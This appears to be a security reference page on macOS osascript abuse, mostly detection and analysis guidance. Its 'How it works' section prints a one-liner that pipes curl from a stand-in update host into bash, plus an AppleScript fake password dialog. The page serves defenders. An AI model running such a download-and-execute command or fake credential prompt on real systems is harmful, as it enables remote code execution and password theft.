Skip to content

osascript Execution

The built-in AppleScript/JXA interpreter runs system automation, shell commands and fake credential dialogs from a script embedded in a document or email — the macOS analogue of mshta.exe/wscript.exe.

osascript is a command-line interpreter, shipped on every Mac, for AppleScript and JavaScript for Automation (JXA). Both languages can drive other applications through Apple Events, prompt the user with native-looking dialogs, and shell out to arbitrary commands (do shell script in AppleScript, app.doShellScript in JXA) — giving broad system automation from a plain-text script with no compiled binary required. Because osascript is Apple-signed and present by default, it is the macOS equivalent of mshta.exe/wscript.exe/cscript.exe on Windows: a trusted interpreter that happily runs whatever text an attacker hands it, whether typed at a terminal, embedded in a document macro, or attached as a script to a phishing email.

How it works

A one-liner drives another app or the shell directly:

bash
osascript -e 'do shell script "curl -s https://update.example.com/stage2 | bash"'

A common social-engineering payload uses AppleScript's native dialog support to imitate a system prompt and harvest the user's password:

applescript
display dialog "macOS requires your password to install updates." ¬
  default answer "" with hidden answer with icon caution

JXA gives the same capability with JavaScript syntax and easier access to Cocoa/Foundation APIs, which some payloads prefer for direct file and network operations without shelling out at all. Distribution is typically a .scpt compiled script, a plain .js/.applescript file, or the script embedded inside a document macro or a disk-image "installer" the victim is told to run.

Detection & analysis

Static analysis:

  • Extract and read any embedded AppleScript/JXA source from a suspect document, disk image, or .scpt file — osadecompile recovers readable source from a compiled script. Look for do shell script, network calls, and display dialog/display alert prompts requesting credentials.
  • A downloaded archive or disk image that bundles a script alongside an "installer" narrative (fake update, fake Flash/plugin installer) is a recurring delivery pattern.

Dynamic analysis:

  • Log osascript command-line invocations and their full argument/script content; an unusual parent process (Mail, a downloaded document viewer, a mounted disk image) spawning osascript is the primary signal, mirroring how mshta.exe/wscript.exe parentage is treated on Windows.
  • Watch for osascript immediately followed by a network connection or a shell child process (bash, sh, curl) — the interpreter itself doing the network fetch is a strong indicator versus a legitimate automation script.

Detection rule hint:

Alert on osascript process creation where the parent is a mail client, a document viewer, or a process running from a mounted disk image/download folder, especially when the invocation includes -e "do shell script" or the script argument references a network URL.

Votes

Comments(0)